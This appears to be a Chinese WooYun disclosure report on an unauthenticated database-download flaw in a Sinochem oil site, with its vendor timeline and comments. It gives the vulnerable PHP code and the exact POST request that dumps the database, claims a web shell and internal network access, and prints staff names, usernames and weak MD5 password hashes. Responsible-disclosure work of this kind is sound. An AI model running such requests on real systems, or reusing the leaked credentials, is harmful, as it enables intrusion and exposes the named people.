2015-07-05: 细节已通知厂商并且等待厂商处理中 2015-07-09: 厂商已经确认,细节仅向厂商公开 2015-07-19: 细节向核心白帽子及相关领域专家公开 2015-07-29: 细节向普通白帽子公开 2015-08-08: 细节向实习白帽子公开 2015-08-23: 细节向公众公开
中石化数据库文件任意下载(数十万数据泄露)导致登陆管理员后台Getshell(可漫游内网)安全是一个整体
中国中化集团公司(以下简称“中化集团”)是中国四大国家石油公司之一,中化石油是中化集团石油业务经营管理的主要载体之一。依托六十多年从事石油业务积累的雄厚基础,中化石油充分发挥在国内外市场拥有的资源、渠道和运作优势,积极提供经济社会发展所需的石油资源,并参与国家战略石油储备体系建设,已成为中国石油安全供应体系的重要成员。
问题出现在该处:
http://www.sinochemoil.com/esbclient/database/datebase_back.php
代码如下:
if($_POST['_task']=='doDataBackup'){global $DBCfg,$config;/* $conn=@mysql_pconnect($DBCfg['server'],$DBCfg['user'],$DBCfg['pass']);mysql_select_db($DBCfg['database'],$conn);*/$tables=array();$a=0;$conn=@mysql_pconnect($DBCfg['server'],$DBCfg['user'],$DBCfg['pass']);mysql_select_db($DBCfg['database'],$conn);//....$saveto = $_POST["location"]; $back_mode = 'all'; // 定义数据保存的文件名$local_filename=$prefix.date('Y_m_d_H-i-s').".sql";$filename = "../../db/back/".$prefix.date('Y_m_d_H-i-s').".sql"; // 保存在服务器上的文件名if($saveto == "local"){ //... header ("Content-Disposition: attachment; filename=$local_filename"); echo $sqldump; exit;}if($saveto == "server"){ //...}}
可见只要提交如下:
并post提交:_task=doDataBackup&location=local
即可下载数据库文件
数十万数据:
发现此主站有大量分站:
数据库各种管理员数据:
超级管理员,md5解密之:
Getshellshell:
http://www.sinochemoil.com/filehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/2015/07/05/1436273514.PHP
可漫游内网:
3389开着:
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING TCP 10.6.22.2:80 61.153.219.214:10765 ESTABLISHED TCP 10.6.22.2:80 61.153.219.214:34917 ESTABLISHED TCP 10.6.22.2:80 61.153.219.214:37650 ESTABLISHED TCP 10.6.22.2:80 61.153.219.214:54544 ESTABLISHED TCP 10.6.22.2:80 61.153.219.214:57965 ESTABLISHED TCP 10.6.22.2:80 61.153.219.214:58851 ESTABLISHED TCP 10.6.22.2:80 66.249.75.103:41740 ESTABLISHED TCP 10.6.22.2:80 66.249.75.119:34184 ESTABLISHED TCP 10.6.22.2:80 175.25.28.41:5891 ESTABLISHED TCP 10.6.22.2:139 0.0.0.0:0 LISTENING TCP [::]:80 [::]:0 LISTENING TCP [::]:135 [::]:0 LISTENING TCP [::]:445 [::]:0 LISTENING TCP [::]:3306 [::]:0 LISTENING TCP [::]:3389 [::]:0 LISTENING TCP [::]:47001 [::]:0 LISTENING TCP [::]:49152 [::]:0 LISTENING TCP [::]:49153 [::]:0 LISTENING TCP [::]:49154 [::]:0 LISTENING TCP [::]:49155 [::]:0 LISTENING TCP [::]:49156 [::]:0 LISTENING TCP [::]:49157 [::]:0 LISTENING UDP 0.0.0.0:123 *:* UDP 0.0.0.0:500 *:* UDP 0.0.0.0:4500 *:* UDP 0.0.0.0:5355 *:* UDP 10.6.22.2:137 *:* UDP 10.6.22.2:138 *:* UDP [::]:123 *:* UDP [::]:500 *:* UDP [::]:4500 *:*
可上大马
竟然还有fck,威胁更大啊:
因数据库中包含各个分站管理员与密码hash,故可逐一登陆,不再测试
INSERT INTO sys_user VALUES('1','1','0','1','超级管理员','admin','e867d2021a99d801ef254ad958341d60','1','0000-00-00','1','0000-00-00 00:00:00');INSERT INTO sys_user VALUES('17','13','0','999','肖斌','xiaobin','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-26 13:58:20');INSERT INTO sys_user VALUES('22','15','0','999','张文舟','zhangwenzhou','1d2aeacbfd1d099b4ab41fa9caf3eae4','1','0000-00-00','1','2013-10-28 10:02:07');INSERT INTO sys_user VALUES('15','17','0','999','陈涛','chentao','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-26 13:57:39');INSERT INTO sys_user VALUES('16','12','0','999','张亚非','zhangyafei','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-26 13:58:05');INSERT INTO sys_user VALUES('14','16','0','999','王雪','wangxue','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-26 13:57:13');INSERT INTO sys_user VALUES('12','21','0','999','赵伟','zhaowei','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-24 13:34:51');INSERT INTO sys_user VALUES('13','22','0','999','天津栏目管理员','test','202cb962ac59075b964b07152d234b70','1','0000-00-00','12','2013-10-24 13:48:27');INSERT INTO sys_user VALUES('24','23','0','999','一级审批人员','check1','202cb962ac59075b964b07152d234b70','1','0000-00-00','12','2013-10-28 10:11:36');INSERT INTO sys_user VALUES('19','20','0','999','田安涛','tianantao','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-28 09:57:14');INSERT INTO sys_user VALUES('20','19','0','999','吴朦','wumeng','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-28 09:58:23');INSERT INTO sys_user VALUES('21','18','0','999','王坚','wangjian','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-28 09:58:58');INSERT INTO sys_user VALUES('23','14','0','999','殷兵','xuebing','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-28 10:02:39');INSERT INTO sys_user VALUES('25','23','0','999','二级审批人','check2','202cb962ac59075b964b07152d234b70','1','0000-00-00','12','2013-10-28 10:12:00');INSERT INTO sys_user VALUES('26','22','0','999','gggg','123','202cb962ac59075b964b07152d234b70','1','0000-00-00','12','2013-10-28 15:14:01');INSERT INTO sys_user VALUES('28','26','0','999','顾海燕','guhaiyan','202cb962ac59075b964b07152d234b70','1','0000-00-00','15','2013-11-20 15:26:27');INSERT INTO sys_user VALUES('29','1','0','999','汪光应','wgy','25cd2bede9a2f491f217b8454a6d0d6e','1','0000-00-00','1','2013-12-02 17:45:20');INSERT INTO sys_user VALUES('30','28','0','999','佟婷婷','tongtt','e10adc3949ba59abbe56e057f20f883e','1','0000-00-00','21','2013-12-25 12:33:34');INSERT INTO sys_user VALUES('31','15','0','999','徐岭','xuling','e10adc3949ba59abbe56e057f20f883e','1','0000-00-00','22','2014-01-07 16:00:59');INSERT INTO sys_user VALUES('32','31','0','999','应红枫','yinghongfeng','1d2aeacbfd1d099b4ab41fa9caf3eae4','1','0000-00-00','22','2014-01-08 15:20:20');INSERT INTO sys_user VALUES('33','33','0','999','李凤云','lifengyun','202cb962ac59075b964b07152d234b70','1','0000-00-00','22','2014-01-08 15:21:26');INSERT INTO sys_user VALUES('34','34','0','999','曾诚','zengcheng','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2014-01-10 17:22:00');INSERT INTO sys_user VALUES('36','1','0','999','elongtian','elongtian','85f2a5c45c7ce8b1dee48f9f484a0e49','1','0000-00-00','1','2014-10-20 16:15:25');INSERT INTO sys_user VALUES('37','1','0','999','迦兰密语','Hacker','e23c1f69ced8de2d94a87fd904357c22','1','0000-00-00','1','2015-01-29 11:15:00'
已证明
权限,安全是一个整体,千里之堤毁于蚁穴
危害等级:中
漏洞Rank:10
确认时间:2015-07-09 15:37
CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无
无法确认漏洞状态,可否提供漏洞信息。
@中国石油化工股份有限公司 漏洞细节里已经说明漏洞信息了啊~
@Mr.Q 厂商没选对
额…
......这不是石化的官网啊,厂商没对上啊!
@_Thorns 本来也没选这个厂商...没看是cnvd处理的么
这个不是提交过么
